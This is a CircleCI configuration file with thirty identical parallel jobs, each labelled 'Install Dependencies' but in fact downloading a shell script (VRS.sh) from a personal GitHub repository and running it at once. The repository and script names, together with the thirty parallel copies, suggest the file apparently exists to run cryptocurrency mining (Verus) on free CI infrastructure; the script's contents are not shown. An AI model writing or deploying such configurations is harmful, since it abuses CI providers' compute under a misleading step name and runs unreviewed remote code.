version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30